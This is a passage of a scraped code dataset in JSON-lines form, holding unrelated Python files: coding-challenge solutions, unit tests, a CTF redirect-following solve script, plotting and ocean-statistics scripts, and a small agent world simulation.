\"0.1.dev0\"\n\n\nsetup(version=find_version())\n","repo_name":"rgildein/juju-verify","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"33562205802","text":"# https://www.codechef.com/AUG20B/problems/CRDGAME3\n\ntest = int(input())\n\ndef ceil(n):\n if(n > int(n)):\n return int(n) + 1\n return int(n)\n\nfor _ in range(test):\n ab = input().split()\n a = int(ab[0])/9\n b = int(ab[1])/9\n\n a = ceil(a)\n b = ceil(b)\n\n if(a < b):\n print(\"0\",a)\n else:\n print(\"1\",b)\n","repo_name":"NikithKS/Days-of-Coding","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9091832568","text":"import pytest\n\nfrom app import db, create_app\nfrom tests.utils import register, login\nfrom app.controllers import populate_db_by_test_data, bid_generation\n\n\n@pytest.fixture\ndef client():\n app = create_app(environment=\"testing\")\n app.config[\"TESTING\"] = True\n\n with app.test_client() as client:\n app_ctx = app.app_context()\n app_ctx.push()\n db.drop_all()\n db.create_all()\n populate_db_by_test_data()\n bid_generation()\n register(\"sam\")\n login(client, \"sam\")\n yield client\n db.session.remove()\n db.drop_all()\n app_ctx.pop()\n\n\ndef test_edited_bids(client):\n response = client.post(\"/archive_or_export\", data={'1': 'on', '2': 'on'}, follow_redirects=True)\n assert response.status_code == 200\n assert b'Archived' in response.data\n\n\ndef test_biddings(client):\n response = client.get(\"/biddings\")\n assert response.status_code == 200\n assert b\"Client\" in response.data\n","repo_name":"Simple2B/flora","sub_path":"tests/test_biddings.py","file_name":"test_biddings.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32878329797","text":"\n\ndef find_three_words(text: str):\n\n def symbols_of_ascii():\n '''\n Return list of ASCII characters in the ranges\n 33 - 47 | 58 - 64 | 91 - 96 | 123 - 126\n '.', ',', ':', '!', '\"', \"'\", '[', ']', '-', '(', ')', etc.\n '''\n list = []\n list.extend([chr(i) for i in range(33, 48)])\n list.extend([chr(i) for i in range(58, 65)])\n list.extend([chr(i) for i in range(91, 97)])\n list.extend([chr(i) for i in range(123, 127)])\n return list\n\n lst_no = symbols_of_ascii()\n lst = []\n\n for word in text.lower().split():\n if not word in lst_no:\n _word = word\n if word[-1] in lst_no:\n _word = _word[:-1]\n if word[0] in lst_no:\n _word = _word[1:]\n lst.append(_word)\n\n if len(lst) < 3:\n return []\n\n _dict = dict()\n for word in lst:\n _dict[word] = _dict.get(word, 0) + 1\n\n _list = []\n for key, value in _dict.items():\n _list.append((value, key))\n _list.sort(reverse=True)\n\n result = []\n for freq, word in _list[0:3]:\n result.append(word)\n\n return result\n\n\ntext = input('Type your text: ')\nprint(find_three_words(text))\n","repo_name":"Roninon/Test-Task","sub_path":"find-three-words.py","file_name":"find-three-words.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72526788627","text":"import unittest\nfrom mock import Mock\nimport yangvoodoo\nimport subprocess\nimport time\nimport yangvoodoo.sysrepodal\n\n\nclass test_sysrepodal(unittest.TestCase):\n def setUp(self):\n self.subject = yangvoodoo.sysrepodal.SysrepoDataAbstractionLayer()\n self.subject.session = Mock()\n\n def test_handle_error_no_subscribers(self):\n error_mock = Mock()\n error_mock.xpath.return_value = \"/path\"\n error_mock.message.return_value = \"The node is not enabled in running datastore\"\n errors_mock = Mock()\n errors_mock.error_cnt.return_value = 1\n errors_mock.error.return_value = error_mock\n self.subject.session.get_last_errors = Mock(return_value=errors_mock)\n\n with self.assertRaises(\n yangvoodoo.Errors.SubscriberNotEnabledOnBackendDatastore\n ) as context:\n self.subject._handle_error(\"/path\", \"err\")\n self.assertEqual(\n str(context.exception),\n \"There is no subscriber connected able to process data for the following path.\\n /path\",\n )\n\n def test_handle_error_no_other_backend_error(self):\n error_mock = Mock()\n error_mock.xpath.return_value = \"/path\"\n error_mock.message.return_value = \"Someother stuff went wrong\"\n errors_mock = Mock()\n errors_mock.error_cnt.return_value = 1\n errors_mock.error.return_value = error_mock\n self.subject.session.get_last_errors = Mock(return_value=errors_mock)\n\n with self.assertRaises(yangvoodoo.Errors.BackendDatastoreError) as context:\n self.subject._handle_error(\"/path\", \"err\")\n self.assertEqual(\n str(context.exception),\n \"1 Errors occured\\nError 0: Someother stuff went wrong (Path: /path)\\n\",\n )\n","repo_name":"anter74/python-yang-voodoo","sub_path":"test/integration/test_sysrepodal.py","file_name":"test_sysrepodal.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27204382812","text":"import unittest\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\n\nfrom angorapy.common.policies import BetaPolicyDistribution\nfrom angorapy.models import get_model_builder\nfrom angorapy.utilities.model_utils import reset_states_masked, build_sub_model_from, get_layers_by_names\n\n\nclass UtilTest(unittest.TestCase):\n\n def test_masked_state_reset(self):\n model = tf.keras.Sequential((\n tf.keras.layers.Dense(2, batch_input_shape=(7, None, 2)),\n tf.keras.layers.LSTM(5, stateful=True, name=\"larry\", return_sequences=True),\n tf.keras.layers.LSTM(5, stateful=True, name=\"harry\"))\n )\n\n l_layer = model.get_layer(\"larry\")\n h_layer = model.get_layer(\"harry\")\n l_layer.reset_states([s.numpy() + 9 for s in l_layer.states])\n h_layer.reset_states([s.numpy() + 9 for s in h_layer.states])\n reset_states_masked(model, [True, False, False, True, False, False, True])\n\n self.assertTrue(np.allclose([s.numpy() for s in model.get_layer(\"larry\").states],\n [s.numpy() for s in model.get_layer(\"harry\").states]))\n self.assertTrue(np.allclose([s.numpy() for s in model.get_layer(\"larry\").states], [\n [0, 0, 0, 0, 0],\n [9, 9, 9, 9, 9],\n [9, 9, 9, 9, 9],\n [0, 0, 0, 0, 0],\n [9, 9, 9, 9, 9],\n [9, 9, 9, 9, 9],\n [0, 0, 0, 0, 0],\n ]))\n\n # def test_submodeling_from(self):\n # env = gym.make(\"LunarLanderContinuous-v2\")\n # full_model, _, _ = get_model_builder(\"simple\", \"gru\", shared=False)(env, BetaPolicyDistribution(env))\n # sub_model_from_a = build_sub_model_from(full_model, \"beta_action_head\")\n # sub_model_from_b = build_sub_model_from(full_model, \"policy_recurrent_layer\")\n #\n # for sub_model_from in [sub_model_from_a, sub_model_from_b]:\n # layer = get_layers_by_names(sub_model_from, [\"beta_action_head\"])[0]\n #\n # input_shape_raw = layer.get_input_shape_at(1)\n # input_shape_replaced = tuple(v if v is not None else 1 for v in input_shape_raw)\n #\n # out = sub_model_from(tf.random.normal(input_shape_replaced))","repo_name":"ccnmaastricht/angorapy","sub_path":"tests/test_model_utils.py","file_name":"test_model_utils.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"38914235263","text":"import requests\nimport urllib\n\nsession = requests.Session()\nsession.max_redirects = 10000\nrequest = session.get(\"http://localhost\")\n\nchars = \"\"\nfor response in request.history:\n chars += urllib.parse.unquote(response.url.split(\"=\")[-1])\n\nprint(chars)\n\n# Take base64 and decode it for the flag\n","repo_name":"wmgcyber/intakectf-2021-public","sub_path":"Miscellaneous/redirects/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10656915065","text":"import copy\nimport matplotlib.pyplot as plt\nimport parameters_MF_MB as PRM\nimport figures_final as GRAPH\nimport matplotlib_latex_bridge as mlb\n\nmlb.setup_page(textwidth=6.97522, columnwidth=3.36305, fontsize=10)\n\n\ndef main():\n\n\t##################################################\n\t# LEARNING PLOT AND VIOLIN STATISTICAL ANALYSIS FIGURE ##########################\n\tparams = copy.deepcopy(PRM.params)\n\tparams['replay_refs'] = [0,1,2,4]\n\tfig_det = GRAPH.figure_learning_curves_violin_plots(det=True, params=params, thres=0.05)\n\tfig_nondet = GRAPH.figure_learning_curves_violin_plots(det=False, params=params, thres=0.05)\n\tfig_det.savefig(\"Saved_figures/learning_plots_det_1200.jpg\", format='jpg', dpi=1200)\n\tfig_nondet.savefig(\"Saved_figures/learning_plots_nodet_1200.jpg\", format='jpg', dpi=1200)\n\t# plt.show()\n\n\t##################################################\n\n\t# # Q-VALUES AND REPLAYS ANALYSIS FIGURE ##########################\n\tparams = copy.deepcopy(PRM.params)\n\tparams['replay_refs'] = [0,1,2,4]\n\tfig_det = GRAPH.figure_Qvalues(det=True, params=params, legends=False)\n\tfig_nondet = GRAPH.figure_Qvalues(det=False, params=params, legends=True)\n\tfig_det.savefig(\"Saved_figures/qvalues_det.pdf\")\n\tfig_nondet.savefig(\"Saved_figures/qvalues_nodet.jpg\", format='jpg', dpi=300)\n\t# plt.show()\n\nif __name__ == '__main__':\n\tmain()\n\n","repo_name":"esther-poniatowski/Massi2022","sub_path":"data+code_2generate_the_paper_figures/learning_performance_figure/figure_learning_and_qvalues.py","file_name":"figure_learning_and_qvalues.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13955930982","text":"'''\nA pangram is a string that contains every letter of the alphabet. Given a sentence determine whether it is a pangram in the English alphabet. Ignore case. Return either pangram or not pangram as appropriate.\n'''\n\ndef pangrams(s):\n alphabet = {\n 'a': 0,\n 'b': 0,\n 'c': 0,\n 'd': 0,\n 'e': 0,\n 'f': 0,\n 'g': 0,\n 'h': 0,\n 'i': 0,\n 'j': 0,\n 'k': 0,\n 'l': 0,\n 'm': 0,\n 'n': 0,\n 'o': 0,\n 'p': 0,\n 'q': 0,\n 'r': 0,\n 's': 0,\n 't': 0,\n 'u': 0,\n 'v': 0,\n 'w': 0,\n 'x': 0,\n 'y': 0,\n 'z': 0\n }\n s = s.lower()\n split = [*s]\n for letter in split:\n if letter in alphabet:\n alphabet[letter] += 1\n\n print(alphabet)\n counts = alphabet.values()\n if 0 in counts:\n print('not pangram')\n return 'not pangram'\n else: \n print('pangram')\n return 'pangram'\n\npangrams('We promptly judged antique ivory buckles for the next prize')\npangrams('We promptly judged antique ivory buckles for the prize')","repo_name":"scottydphillips/hackerRankPracticeAlgos","sub_path":"python/pangrams.py","file_name":"pangrams.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22116255884","text":"'''\n\n Rotina que lê o banco de dados das UCDS de referência de cada bacia\n e plota gráficos de barra com limites de \"atenção\" e \"alerta\", assim como\n gera tabela excel com estas informações.\n\n Autor: Francisco Thiago Franca Parente (BHYK)\n Criação: 11/03/2020\n\n Edições:\n + 27/08/2020:\n Modificado o gráfico dos últimos dois anos. Foi acrescentado dois\n xticks aos gráfico. Um referente à média ponderada entre janeiro e\n o mês de interesse e outro com o percentual anual do ano anterior.\n\n Ainda, foi adicionado ao código uma nova forma de exportar os\n resultados já exatamente como exposto na tabela do relatório.\n\n'''\n\n# _____________________________________________________________________________\n# Modificar aqui\n# _____________________________________________________________________________\nimport os\n# Diretório onde serão salvos os outputs\nPATH = os.path.normpath(\"XXXXXXXXXXXXXXXX\")\n\n# Intervalo de data para busca no banco de dados\nDATEMIN = u\"01/01/2010 00:00:00\"\nDATEMAX = u\"31/01/2022 23:00:00\"\n\n# Bacias de interesse\nBACIAS = ['Bacia de Santos', 'Bacia de Campos', 'Bacia do Espírito Santo']\n# Definindo os limites de atenção e alerta de vento e onda\nwind_lim = [20., 28.]\nwave_lim = [1.5, 2., 2.5]\n\n# NÚMERO do mês de interesse (1 -jan, 2-fev, ...)\nm_interesse = [1]\n\n# Unidade de medida para vento\nunidademedida = 'nós'\n\n# _____________________________________________________________________________\n\nfrom warnings import filterwarnings\n# Desativação de alertas minimizando mensagens no console\nfilterwarnings(\"ignore\")\n\nfrom sys import path\nfrom datetime import timedelta\nfrom datetime import datetime as dt\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nimport matplotlib.patheffects as PathEffects\nimport time\npth1 = 'XXXXXXXXXXXXXXX'\ndirs = ['data', 'math', 'settings', 'graph']\nfor d in dirs:\n pth2 = pth1 + d\n path.append(pth2)\n\nimport definitions as mopdef\nimport statistic as stc\nimport OCNdb as ocn\nimport histograma as htg\nfrom calendar import monthrange\n# _____________________________________________________________________________\n\n# Variável de escrita excel\nwave_writer = pd.ExcelWriter(PATH + '\\\\wave_todas_bacias.xlsx')\nwind_writer = pd.ExcelWriter(PATH + '\\\\wind_todas_bacias.xlsx')\n\n# Labels dos meses do ano\nMNTHLBL = ('Jan', 'Fev', 'Mar', 'Abr', 'Mai', 'Jun',\n 'Jul', 'Ago', 'Set', 'Out', 'Nov', 'Dez')\n\n# datetime para reindexação\ndti = dt.strptime(DATEMIN, '%d/%m/%Y %H:%M:%S')\ndtf = dt.strptime(DATEMAX, '%d/%m/%Y %H:%M:%S')\n\n# Carregando quais são as unidades unidades representativas das bacias\nUCDS = mopdef.get_ucds_bacias()\n\n# Verificando os anos que serão avaliados\n# ano atual\nYEAR = int(DATEMAX[6:10])\n\nstart = time.time()\n_wind, _wave = pd.DataFrame(), pd.DataFrame()\nfor bx, bacia in enumerate(BACIAS):\n # Pegando as ucds de referência de cada bacia\n ucds_wind = list(filter(None,\n [item for ucd in UCDS.loc[bacia].VENTO.values\n for item in ucd]))\n ucds_wave = list(filter(None,\n [item for ucd in UCDS.loc[bacia].ONDA.values\n for item in ucd]))\n # Lendo dados do banco\n crono = time.time()\n print(\"{} // {}\".format('Lendo vento de', bacia))\n wind = ocn.get_BDs(ucds_wind, [DATEMIN, DATEMAX], 'meteo')\n print(\"{} // {:.2f} min\".format(\n 'Tempo de leitura do vento',\n (time.time() - crono) / 60))\n print(\"{} // {}\".format('Lendo onda de', bacia))\n crono = time.time()\n wave = ocn.get_BDs(ucds_wave, [DATEMIN, DATEMAX], 'wave')\n print(\"{} // {}\".format('Finalizada consulta de dados de', bacia))\n print(\"{} // {:.2f} min\".format(\n 'Tempo de leitura do onda',\n (time.time() - crono) / 60))\n # Verificando unidade de medidia\n if unidademedida == 'nós':\n wind.WSPD = wind.WSPD * 1.94384449\n\n # # Plotando para verificação da série que será analisada\n # fig, ax = plt.subplots(1, 1, figsize=[15, 10])\n # wind.groupby(level=[2]).median().WSPD.plot(ax=ax)\n # ax.set_title(\"Vento {}\".format(bacia))\n # fig.savefig(\n # '{}\\\\Vento_{}.png'.format(PATH, bacia),\n # format='png',\n # bbox_inches='tight',\n # dpi=600)\n\n # fig, ax = plt.subplots(1, 1, figsize=[15, 10])\n # wave.groupby(level=[2]).median().VAVH.plot(ax=ax)\n # ax.set_title(\"Onda {}\".format(bacia))\n # fig.savefig(\n # '{}\\\\Onda_{}.png'.format(PATH, bacia),\n # format='png',\n # bbox_inches='tight',\n # dpi=600)\n\n # Calculando percentual de dados.\n p_wind = stc.percentual(\n wind.groupby(level=[2]).median().WSPD,\n wind_lim,\n '.1f',\n 'Int.',\n atype='anual')\n p_wave = stc.percentual(\n wave.groupby(level=[2]).median().VAVH,\n wave_lim,\n '.1f',\n 'Hs',\n atype='anual')\n _wind = _wind.append(pd.concat([p_wind], keys=[bacia], names=['Bacia']))\n _wave = _wave.append(pd.concat([p_wave], keys=[bacia], names=['Bacia']))\n print('[{}: Ok]'.format(bacia))\n\n_wind.to_excel(wind_writer)\n_wave.to_excel(wave_writer)\nwind_writer.close()\nwave_writer.close()\n\nprint(\"{} // {:.2f} min\".format(\n 'Tempo Total de leitura dos dados',\n (time.time() - start) / 60))\n# _____________________________________________________________________________\n# Plotando\n# _____________________________________________________________________________\n\nwidth = .45\n\n# PLOTA DADO DE TODOS OS ANOS DO MÊS DE INTERESSE\nfor name, param in zip(['wind', 'wave'], [_wind, _wave]):\n for m in m_interesse:\n fig = plt.figure(figsize=(12, 9))\n\n ordem = ['Bacia de Santos', 'Bacia de Campos', 'Bacia do Espírito Santo']\n for splt, bc in enumerate(ordem):\n\n xlbl = [str(x) for x in param.index.levels[1]]\n xtik = np.arange(0, len(xlbl), 1)\n\n if param.loc[bc].xs(MNTHLBL[m - 1], level=1).shape[0] != len(xlbl):\n ckdata = param.loc[bc].xs(MNTHLBL[m - 1], level=1)\n for ey in xlbl:\n if int(ey) not in ckdata.index:\n ckdata = ckdata.append(\n pd.DataFrame(\n data=[],\n index=[int(ey)],\n columns=ckdata.columns))\n ckdata = ckdata.sort_index()\n bars = {x: ckdata[x].values for x in ckdata.columns}\n else:\n ckdata = param.loc[bc].xs(MNTHLBL[m - 1], level=1)\n lmts = list(ckdata.columns)\n lmts.reverse()\n bars = {x: ckdata[x].values for x in lmts}\n\n ax = fig.add_subplot(\n int('{}1{}'.format(len(param.index.levels[0]), splt + 1)))\n\n if len(bars) > 2:\n colors = ['#E24A33', '#FBC15E', '#27AE60']\n else:\n colors = ['#E24A33', '#FBC15E']\n\n bottom = np.zeros(len(xtik))\n for n, bar in enumerate(bars.keys()):\n rects2 = ax.bar(\n xtik,\n bars[bar],\n width, color=colors[n],\n bottom=np.nan_to_num(bottom),\n align='center', alpha=.7, edgecolor='k',\n label=bar)\n bottom += bars[bar]\n\n\n if name == 'wind':\n ax.set_ylim(0., 40)\n dy, legx = 6, .738\n else:\n ax.set_ylim(0., 120)\n dy, legx = 10, .868\n ax.set_xlim(0 - width, xtik[-1] + width)\n ax.set_ylabel('Registros (%)', fontsize=14)\n \n ax.text(-0.4, ax.get_ylim()[1] - dy, bc, fontsize=14, weight='bold')\n\n plt.xticks(xtik, xlbl, fontsize=14)\n for label in ax.xaxis.get_majorticklabels():\n label.set_fontsize(14)\n for label in ax.yaxis.get_majorticklabels():\n label.set_fontsize(14)\n # COLOCANDO VALORES NAS BARRAS\n texto = [(bars[x]) for x in bars.keys()]\n\n bottom = np.zeros(len(xtik))\n for tx in texto:\n strnumb = ['{0:2.1f}%'.format(round(x, 2)).replace('.', ',') for x in tx]\n for _, x in enumerate(range(len(xtik))):\n txt = ax.text(\n xtik[x],\n tx[x] + bottom[x],\n strnumb[x],\n horizontalalignment='center',\n fontsize=11)\n plt.setp(\n txt,\n path_effects=[\n PathEffects.withStroke(linewidth=3, foreground=\"w\")])\n bottom += tx\n\n ax.legend(\n prop={'size': 14},\n bbox_to_anchor=(legx, -.2),\n ncol=len(bars))\n\n fig.savefig(\n '{}\\\\{}_anual.png'.format(PATH, name),\n format='png',\n bbox_inches='tight')\n\n\n# _____________________________________________________________________________\n# PLOTA DADO DOS ÚLTIMOS DOIS ANOS\n# _____________________________________________________________________________\nnewlabel = MNTHLBL.__add__(tuple(\n ['Média \\n ponderada \\n (Jan - {})'.format(MNTHLBL[m_interesse[0]-1]),\n 'Total \\n de {}\\n e {}'.format(param.index.levels[1][-2], param.index.levels[1][-3])]\n))\n\nxax2 = np.append(np.arange(1, 13), 14)*1.3\nwidth = 0.3\n\nfor name, param in zip(['wind', 'wave'], [_wind, _wave]):\n fig = plt.figure(figsize=(12, 9))\n yr = list(param.index.levels[1][-3:])\n\n ordem = ['Bacia de Santos', 'Bacia de Campos', 'Bacia do Espírito Santo']\n for splt, bc in enumerate(ordem):\n\n ax = fig.add_subplot(int('{}1{}'.format(\n len(param.index.levels[0]),\n splt + 1)))\n for i, y in enumerate(yr):\n if i == 0:\n dx = -.3\n sb = .3\n linewidth = 1\n elif i == 1:\n dx = .0\n sb = .7\n linewidth = 1\n else:\n dx = .3\n sb = 1.\n linewidth = 2\n\n # Calculado o peso de cada mês para média ponderada\n peso = []\n for m in np.arange(1, 13, 1):\n peso.append(np.mean([\n monthrange(y, m)[1]\n for y in np.unique(param.loc[bc].index.get_level_values(0))\n ]) / 31)\n try:\n # pegando somente os percentuais dos meses até o mês de interesse\n sqz = param.loc[bc].loc[y].drop('Total', axis=0)\n # pegando percentuais até o mes de interesse para acumulado\n avg = param.loc[bc].loc[y].drop('Total', axis=0)[:m_interesse[0]]\n\n lmts = list(param.columns)\n lmts.reverse()\n bars = {}\n for cll in lmts:\n bars[cll] = np.nan_to_num(np.append(\n sqz[cll].values,\n round(np.average(\n avg[cll].values,\n weights=peso[:m_interesse[0]]), 2)))\n\n # the bars\n if len(bars) > 2:\n colors = ['#E24A33', '#FBC15E', '#27AE60']\n else:\n colors = ['#E24A33', '#FBC15E']\n\n bottom = np.zeros(len(xax2))\n for n, bar in enumerate(bars.keys()):\n rects2 = ax.bar(\n xax2 + dx,\n bars[bar],\n width, color=colors[n],\n bottom=np.nan_to_num(bottom),\n align='center', alpha=sb, edgecolor='k',\n label=bar, linewidth=linewidth)\n bottom += np.nan_to_num(bars[bar])\n\n for label in ax.xaxis.get_majorticklabels():\n label.set_fontsize(14)\n for label in ax.yaxis.get_majorticklabels():\n label.set_fontsize(14)\n except Exception:\n continue\n # texto = [(bars[x]) for x in bars.keys()]\n\n # bottom = np.zeros(len(xax2))\n # for tx in texto:\n # strnumb = ['{0:2.1f}%'.format(round(x, 2)).replace('.', ',') for x in tx]\n # for _, x in enumerate(range(len(xax2))):\n # txt = ax.text(\n # xax2[x] + dx,\n # tx[x] + bottom[x],\n # strnumb[x],\n # horizontalalignment='center',\n # fontsize=11)\n # plt.setp(\n # txt,\n # path_effects=[\n # PathEffects.withStroke(linewidth=3, foreground=\"w\")])\n # bottom += tx\n\n # ax.set_xlim(0, 17)\n if name == 'wind':\n ax.set_ylim(0., 40)\n ax.text(0.2, ax.get_ylim()[1] - 6, bc, fontsize=14, weight='bold')\n\n else:\n ax.set_ylim(0., 110)\n ax.text(0.2, ax.get_ylim()[1] - 10, bc, fontsize=14, weight='bold')\n ax.set_ylabel('Registros (%)', fontsize=14)\n\n sb, dx = [.3, .7], [-.3, .3]\n for m, yss in enumerate(yr[:-1]):\n btm = 0\n for n, cll in enumerate(lmts):\n acmval = param.loc[bc].loc[yss].loc['Total'][cll]\n acum = ax.bar(\n 16*1.3 + dx[m], acmval,\n width + .2, color=colors[n],\n align='center', alpha=sb[m], bottom=btm, edgecolor='k')\n btm += acmval\n if splt == len(param.index.levels[0]) - 1:\n plt.xticks(np.append(xax2, 16 * 1.3), newlabel,\n fontsize=14, rotation=0)\n else:\n plt.xticks([])\n\n if name == 'wind':\n bboxx = (.86, -.40)\n xx0, yy0 = -1., -23\n xx1, yy1 = 5.6, -23\n xx2, yy2 = 12.6, -23\n if name == 'wave':\n bboxx = (.82, -.4)\n xx0, yy0 = .03, -60\n xx1, yy1 = 6.0, -60\n xx2, yy2 = 12.5, -60\n ax.text(xx2, yy2, str(yr[2]), weight='bold')\n ax.text(xx1, yy1, str(yr[1]), weight='bold')\n ax.text(xx0, yy0, str(yr[0]), weight='bold')\n\n ax.legend(\n prop={'size': 12},\n bbox_to_anchor=bboxx,\n frameon=False,\n ncol=3,\n columnspacing=5.5)\n\n fig.savefig(\n '{}\\\\{}_compara_{}_{}_{}.png'.format(PATH, name, yr[0], yr[1], yr[2]),\n format='png',\n bbox_inches='tight')\n\n# _____________________________________________________________________________\n# EXPORTANDO TABELA UTILIZADA NO RELATÓRIO \n# _____________________________________________________________________________\nwindtable = _wind.xs(MNTHLBL[m_interesse[0] - 1], level=2)\nwavetable = _wave.xs(MNTHLBL[m_interesse[0] - 1], level=2)\nindyrs = np.arange(2018, windtable.index.levels[1][-1] + 1, 1)\n\ntwd, twv = pd.DataFrame(), pd.DataFrame()\nfor bc in windtable.index.levels[0]:\n wd = windtable.loc[bc].loc[indyrs]\n mnyrs = windtable.loc[bc][:-1].mean().to_frame().T\n mnyrs.index = ['{} a {}'.format(windtable.loc[bc].index[0],\n windtable.loc[bc].index[-2])]\n wd = wd.append(mnyrs)\n wd[\"Total\"] = wd.sum(axis=1)\n wd = wd.round(1)\n\n twd = twd.append(pd.concat([wd], keys=[bc], names=['Bacia']))\n\n wv = wavetable.loc[bc].loc[indyrs]\n mnyrs = wavetable.loc[bc][:-1].mean().to_frame().T\n mnyrs.index = ['{} a {}'.format(wavetable.loc[bc].index[0],\n wavetable.loc[bc].index[-2])]\n wv = wv.append(mnyrs)\n wv[\"Total\"] = wv.sum(axis=1)\n wv = wv.round(1)\n\n twv = twv.append(pd.concat([wv], keys=[bc], names=['Bacia']))\n\nbcorder = ['Bacia de Santos', 'Bacia de Campos', 'Bacia do Espírito Santo']\nexcel = pd.ExcelWriter('{}\\\\Tabela_relatorio.xlsx'.format(PATH))\nfor sheet, parm in zip(('vento', 'onda'), (twd, twv)):\n parm.T[bcorder].T.to_excel(excel, sheet_name=sheet)\nexcel.close()\n\n#_________________________________________________________________\n# Linhas para plot de comparação entre UCDs, média e mediana\n\n # fig, ax = plt.subplots(1, 1, figsize=[15, 10])\n # for ucd in wind.index.levels[0]:\n # wind.loc[ucd].loc['YOUNG'].WSPD.plot(\n # ax=ax,\n # alpha=1,\n # linewidth=0,\n # marker='o',\n # markersize=4)\n # wind.groupby(level=[2]).median().WSPD.plot(\n # ax=ax,\n # linestyle='-',\n # alpha=1,\n # linewidth=2,\n # color='k')\n # wind.groupby(level=[2]).mean().WSPD.plot(\n # ax=ax,\n # linestyle='-',\n # alpha=1,\n # linewidth=2,\n # color='r')\n # fig.savefig(\n # '{}\\\\teste1.png'.format(PATH),\n # format='png',\n # bbox_inches='tight',\n # dpi=600)\n\n # fig, ax = plt.subplots(1, 1, figsize=[15, 10])\n # for ucd in wind.index.levels[0]:\n # wind.loc[ucd].loc['YOUNG'].WSPD[:200].plot(\n # ax=ax,\n # alpha=1,\n # linewidth=0,\n # marker='o',\n # markersize=4)\n # wind.groupby(level=[2]).median().WSPD[:200].plot(\n # ax=ax,\n # linestyle='-',\n # alpha=.7,\n # linewidth=3,\n # color='k')\n # wind.groupby(level=[2]).mean().WSPD[:200].plot(\n # ax=ax,\n # linestyle='-',\n # alpha=.7,\n # linewidth=3,\n # color='r')\n # fig.savefig(\n # '{}\\\\teste2.png'.format(PATH),\n # format='png',\n # bbox_inches='tight',\n # dpi=600)\n","repo_name":"thiag0p/BHYK_scripts_ocn","sub_path":"scripts/05.Demandas_diferenciadas/Analise_desempenho.py","file_name":"Analise_desempenho.py","file_ext":"py","file_size_in_byte":17778,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"421752812","text":"import json\n\n# data = '{\"aa\":\"北京\"}'\n# dict_data = json.loads(data)\n# print(data,type(data))\n# print(dict_data,type(dict_data))\n# str_data = json.dumps(dict_data)\n# print(str_data,type(str_data)),\n#\n# with open('temp.json','w') as f:\n# f.write(str_data)\n\nwith open('temp.json','r') as f:\n data = json.load(f)\nprint(data)\n\nwith open('temp2.json','w') as g:\n json.dump(data,g)","repo_name":"ioscarry/JXWY_PLUS","sub_path":"dump_load.py","file_name":"dump_load.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73554576786","text":"import json\nimport logging\nfrom logging import FileHandler\nfrom logging import Formatter\nimport os\nimport time\nimport numpy as np\nfrom pacemaker.v00 import Pacemaker\n\nCLOCK_FREQ_HZ = 48\nN_ACTIONS = 2\nN_POSITIONS = 5\n\n# valid levels are {DEBUG, INFO, WARNING, ERROR, CRITICAL}\nLOGGING_LEVEL = logging.INFO\n\n\nclass World:\n \"\"\"\n In this world, the agent can occupy one of N_POSITIONS on a line.\n It has two actions available, move right and move left by one position.\n Attempts to move past the last position have no effect.\n\n action[0] indicates a move to the left\n action[1] indicates a move to the right\n \"\"\"\n\n def __init__(self):\n self.pacemaker = Pacemaker(CLOCK_FREQ_HZ)\n self.n_actions = N_ACTIONS\n self.n_positions = N_POSITIONS\n\n # Initialize the world\n self.position = np.random.randint(self.n_positions)\n\n # Set up logging\n os.makedirs(\"log\", exist_ok=True)\n log_name = f\"{int(time.time())}\"\n self.logger = logging.getLogger(\"world\")\n self.logger.setLevel(LOGGING_LEVEL)\n logger_file_handler = FileHandler(\n os.path.join(\"log\", f\"{log_name}_world.log\"))\n logger_file_handler.setLevel(LOGGING_LEVEL)\n logger_file_handler.setFormatter(Formatter(\"%(message)s\"))\n self.logger.addHandler(logger_file_handler)\n\n def run(self, model_action_q, model_sensor_q, animation_sensor_q):\n while True:\n self.pacemaker.beat()\n # The combined effect of all actions issued.\n # Positive values are steps to the right.\n # Negative values are steps to the left.\n # Zero means no action.\n net_action = 0\n while not model_action_q.empty():\n timestamp, actions = model_action_q.get()\n self.logger.debug(\n json.dumps(\n {\n \"level\": \"DEBUG\",\n \"ts\": timestamp,\n \"action_received\": list(actions),\n }\n )\n )\n net_action = net_action - actions[0] + actions[1]\n\n # Apply the actions\n self.position += net_action\n # Enforce lower and upper limits\n self.position = np.maximum(\n 0, np.minimum(self.n_positions - 1, self.position)\n )\n acted_time = time.time()\n self.logger.debug(\n json.dumps(\n {\n \"level\": \"DEBUG\",\n \"ts\": acted_time,\n \"new_position\": int(self.position),\n }\n )\n )\n\n # Communicate the new position back to the model\n sensors = np.zeros(self.n_positions)\n try:\n sensors[int(self.position)] = 1\n except IndexError:\n self.logger.debug(\n json.dumps(\n {\n \"level\": \"ERROR\",\n \"ts\": acted_time,\n \"msg\": (\n f\"IndexError assigning position {self.position}\"\n + f\"to sensor array of size {sensors.size}\"\n ),\n }\n )\n )\n\n model_sensor_q.put((acted_time, sensors))\n animation_sensor_q.put((acted_time, 